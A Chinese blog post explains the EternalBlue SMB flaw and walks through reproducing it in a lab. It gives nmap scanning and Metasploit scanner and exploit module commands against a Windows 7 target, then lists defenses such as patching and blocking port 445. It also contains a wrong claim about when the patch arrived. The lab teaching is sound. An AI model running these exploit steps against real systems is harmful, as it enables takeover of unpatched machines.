【网络病毒】永恒之蓝漏洞原理及复现

已于 2024-01-05 15:59:03 修改
阅读量1.8k 收藏 25
点赞数 22
文章标签: 网络安全 服务器 安全
于 2024-01-04 18:35:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A1_3_9_7/article/details/135393457
版权

在这里插入图片描述

一.永恒之蓝介绍

1.什么是永恒之蓝

永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。

2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。

2.SMB协议介绍。

SMB(ServerMessage Block)通信协议是微软(Microsoft)和英特尔(Intel)在1987年制定的协议,主要是作为Microsoft网络的通讯协议。SMB 是在会话层(session layer)和表示层(presentation layer)以及小部分应用层(application layer)的协议。SMB使用了NetBIOS的应用程序接口 (Application Program Interface,简称API),一般端口使用为139,445。

3.SMB会话生命阶段。

1) SMB协议协商(Negotiate)

在一个SMB还没有开始的时候,由客户端率先发出一个协商请求。在请求中,客户端会列出所有它所支持协议版本以及所支持的一些特性(比如加密Encryption、持久句柄Persistent Handle、客户端缓存Leasing等等)。而服务端在回复中则会指定一个SMB版本且列出客户端与服务端共同支持的特性。

2)建立SMB会话(Session Setup)

客户端选择一个服务端支持的协议来进行用户认证,可以选择的认证协议一般包括NTLM、Kerberos等。按照选择的认证协议的不同,这个阶段可能会进行一次或多次SESSION_SETOP请求/回复的网络包交换。

3)连接一个文件分享(Tree Connect)

在会话建立之后,客户端会发出连接文件分享的请求。源于文件系统的树形结构,该请求被命名为树连接(Tree Connect)。以SMB协议的阿里云NAS为例,一般的SMB挂载命令为:

net use z: \\\\XXX.nas.aliyuncs.com\\myshare

其中的“ \\XXX.nas.aliyuncs.com\myshare”便是我们将要连接的那个文件分享,也便是那棵“树”。如果在“myshare”中创建有子目录“abc”,那直接连接“abc”这棵子树也是可以的:

net use z: \\\\XXX.nas.aliyuncs.com\\myshare\\abc

4) 文件系统操作

在文件分享连接成功之后,用户通过SMB客户端进行真正的对于目标文件分享的业务操作。这个阶段可以用到的指令有CREATE、CLOSE、FLUSH、READ、WRITE、SETINFO、GETINFO等等。

5)断开文件分享连接(Tree Disconnect)

当一个SMB会话被闲置一定时间之后,Windows会自动断开文件分享连接并随后中止SMB会话。这个闲置时间可以通过Windows注册表进行设定。当然,用户也可以主动发起断开连接请求。

6)终止SMB会话(Logoff)

当客户端发出会话中止请求并得到服务端发回的中止成功的回复之后,这个SMB会话至此便正式结束了。

二.实验环境

1.环境介绍

攻击机:kali:ip:192.168.248.128

靶机:windows7专业版:ip:192.168.248.130

2.工具介绍

Metasploit:

Metasploit框架(简称MSF)是一个开源工具,旨在方便渗透测试,它是由Ruby程序语言编 写的模板化框架,具有很好的扩展性,便于渗透测试人员开发,使用定制的工具模板。

该工具有六个模块,分别为辅助模块(auxiliary)、渗透攻击模块(exploits)、后渗透攻击模块(post)、攻击载荷模块(payloads)、空指令模块(nops)、编码器模块(encoders),其中msf为总模块,其他均为分支模块。

此工具集成在kali中。其中auxiliary/scanner/smb/smb_ms17_010是永恒之蓝扫描模块,exploit/windows/smb/ms17_010_eternalblue是永恒之蓝攻击代码,一般配合使用,前者先扫描,若显示有漏洞,再进行攻击。

三.实验步骤

1.确定连通

用kali中ping命令测试。

2.查看靶机开放端口

nmap -r 192.168.248.130

确定端口开放。

3.进入msf

1)使用auxiliary模块。

use auxiliary/scanner/smb/smb\_ms17\_010

2)查看需要配置的信息

show  options

3)设置攻击目标及端口

set rhosts 192.168.248.130
set rport 445

经测试后发现存在漏洞。

4)使用exploit/windows/smb/ms17_010_eternalblue进行攻击。

use exploit/windows/smb/ms17\_010\_eternalblue

至此漏洞利用结束。

四.永恒之蓝防护

1)禁用SMB协议

2)打开Windows Update,或手动安装补丁

3)使用防火墙阻止445端口的连接,或者使用进/出站规则阻止445端口的连接

4)不要随意打开陌生的文件

5)安装杀毒软件,及时更新病毒库

五.网络安全工程师(白帽子)企业级学习路线

第一阶段:安全基础(入门)

img

第二阶段:Web渗透(初级网安工程师)

img

第三阶段:进阶部分(中级网络安全工程师)

img

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉【整整282G!】网络安全&黑客技术小白到大神全套资料,免费分享!

学习资源分享

在这里插入图片描述

网安导师小李
关注
  • 22
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
渗透基础笔记+作业(永恒之蓝复现
09-08
渗透基础+永恒之蓝复现 漏洞挖掘 win7 ms17-010
勒索病毒(永恒之蓝)
读书 买花 长大
12-26 1781
Wannacry-永恒之蓝
2024年最新[永恒之蓝]实战-漏洞复现_永恒之蓝漏洞复现实验(1)
2401_84297796的博客
05-03 743
1、msfconsole进入MSF模式,再测试能不能ping通目标主机(192.168.164.129),用nmap扫描主机开放445端口,接下用msf测试一下漏洞是否存在。3、我们在第二步的时候使用的是auxiliary模块进行的漏洞检测,这回我们使用exploit模块进行漏洞利用。2、这里我们先选择#1的auxiliary(辅助模块)先进行踩点,查看漏洞是否可以利用,再去进行渗透攻击。3、使用#show options 命令,查看需要设置的选项(Required为yes是必须设置的选项)。
永恒之蓝】全网最全的永恒之蓝
喜欢听花海的博客
03-09 1647
永恒之蓝的全过程复现,和对于该漏洞的扩展操作。
EternalBlue【永恒之蓝漏洞详解(复现、演示、远程、后门、入侵、防御)内容丰富-深入剖析漏洞原理-漏洞成因-以及报错解决方法-值得收藏!
m0_73734159的博客
12-26 5398
2017年永恒之蓝漏洞,编号为ms17漏洞。现在只有一些低版本的电脑没有打ms17_010的补丁,windows7 以上版本几乎都没有这个漏洞了。虽然如此,此漏洞非常经典,现如今仍有很大的学习漏洞原理以及深入研究防御策略都有很大的借鉴和学习研究的意义。让大家可以对网络安全更加重视,网络安全刻不容缓,让我们为国家网络安全的建设共同努力!
永恒之蓝(MS17-010)详解
最新发布
m0_64481831的博客
05-29 805
SMB是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居都是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。SMB工作原理1、客户端发送一个SMB negport请求数据包,并列出它所支持的所有SMB的协议版本。服务器收到请求消息后响应请求,并列出希望使用的SMB协议版本。如果没有可用的协议版本则返回0xFFFFH,结束通信。
网络攻防——永恒之蓝
weixin_46560512的博客
03-09 2万+
主要介绍永恒之蓝程序,即 windows7的SMB协议漏洞以及相关的攻击方式。
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
m0_65712192的博客
11-01 2万+
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
可刑又可拷!永恒之蓝漏洞原理复现
hack0919的博客
04-24 5264
2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒
MS17-010(永恒之蓝漏洞分析与复现
热门推荐
未完成的歌~的博客
03-12 6万+
文章目录一、漏洞简介1、永恒之蓝介绍:2、漏洞原理:3、影响版本:二、漏洞复现复现环境:复现过程:1、主机发现:2、使用MSF的永恒之蓝漏洞模块3、使用ms17-010扫描模块,对靶机进行扫描:4、使用ms17-010攻击模块,对靶机进行攻击5、得到靶机shell6、通过shell对靶机进行控制 一、漏洞简介 1、永恒之蓝介绍: 永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露
基础渗透测试实验—永恒之蓝漏洞复现
G6_12的博客
06-08 4031
ms17-010,永恒之蓝漏洞复现
漏洞复现原理和解释.txt
01-31
漏洞复现
EternalBlue【永恒之蓝漏洞详解(复现、演示、远程,2024最新阿里网络安全高级面试题及答案
2401_83974639的博客
04-13 933
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
永恒之蓝漏洞
ZXT02的博客
12-21 846
仅限学习使用!!!
永恒之蓝全过程复现
Zhaokangkang123的博客
02-09 6345
超详细永恒之蓝复现教程
永恒之蓝EternalBlue漏洞复现
weixin_51909453的博客
12-15 1622
永恒之蓝EternalBlue漏洞复现 1.背景 永恒之蓝(EternalBlue)是2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB协议漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。 2.漏洞原理 永恒之蓝是在Win
gaynell永恒之蓝
12-07
根据提供的引用内容,永恒之蓝是一种利用MS17-010漏洞的攻击方式。下面是使用永恒之蓝攻击的步骤: 1. 打开终端并启动Metasploit框架:msfconsole 2. 使用永恒之蓝攻击模块:use exploit/windows/smb/ms17_010_eternalblue 3. 查看攻击模块的选项:show options 4. 配置攻击模块的选项,例如设置目标IP地址:set RHOSTS <目标IP地址> 5. 运行攻击模块:run 需要注意的是,使用永恒之蓝攻击是非法的,且可能会对他人造成严重的损失。因此,我们强烈建议您不要进行此类攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网安导师小李

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值